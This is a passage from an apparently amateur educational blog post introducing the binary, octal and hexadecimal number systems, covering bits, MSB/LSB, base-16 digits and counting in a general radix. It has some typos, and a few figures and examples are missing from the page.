  • Hence,the largest value of a digit is 1 an the number of values a digit can assume is two i.e. 0 and 1.
  • The weighted values for different positions for a binary system are as show in below fig.
  • The binary digit(0 and 1) are also called as bits.Thus,binary system is a two bit system.
  • The leftmost bit in a given binary number with the highest weight is called as Most Significant Bit(MSB) whereas the rightmost bit in a given number with the lowest weight is called as Least Significant Bit(LSB).

Binary Number Format:

  • We typically write binary number as a sequence of bits(bits is short for binary digits.).We have definition for there bits.These boundaries are:
  • In any number base,we may add as many leading zeros as we wish without changing its value.
  • However,we normally add leading zeros to adjust the binary number to a desired size of boundary.
  • For example,we can represent the number five as:

Disadvantages of the Binary System:

  • The binary number system has an important drawback.It requires a very long string of 1's and 0's to represent a decimal number.For example:
          (128)10=(10000000)2.

  • So we require 8 bits to represent (128)10.
  • To overcome this the other numbering system were developed.

Octal Number System:

The important features of the octal number system are as follows:
  1. Base:The base used for octal number system is 8.
  2. Each digit in octal system will assume 8 different values from 0 to 7.
  3. The largest value of a digit in the octal system will be 7.The below figure represents the octal number system.The last row of figure represents the largest value of digit.
  4. Each digit has a different multiple of base.

Application  of Octal System:

  1. In order to represent large numbers,we will need a huge strings of 0's and 1's if the binary system is used.
  2. So the octal system can be used for reducing the size of the large binary number.
  3. But it is important to note that the digital circuits and computers internally work strictly with the binary structure and not with the octal structure.
  4. The octal structure is used only for the convenience of the user.

Hexadecimal Number System:

The important features of a hexadecimal number system are as follows:
  • Base:The base of hexadecimal system is 16.
  • The number of values assumed by each digit is 16.The values include digits 0 through 9 followed by alphabets A to F(A,B,C,D,E,F).
  • Hexadecimal values are: 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F.
  • O represent least significant digit whereas F represents the most significant digit.
To have base 16,we need 16 digits.Hence,we use 0 through 9 but need more 6 digits.To overcome this,we use first six alphabets letters A,B,C,D,E,F.Here, A represents 10,B represents 11,C represents 12,D represents 13,E represents 14,F represents 15. 

Counting in a general Radix(Base) r:

  • We have discussed the number system with radix 10,2,8 and 16.Every such system having a radix "r" contains "r" distinct characters.
  • In decimal system the number character is 10.Similarly,in octal system the number of characters is 8.
Check out this video by Soham Railkar.The video is about Introduction to Number System.You can find this video also on SKRtutorials.

Next update will be related to conversion of number system.

 

Subscribe to our Newsletter

Contact our Support

Email us: nerdprogrammergm@gmail.com

Our Team Memebers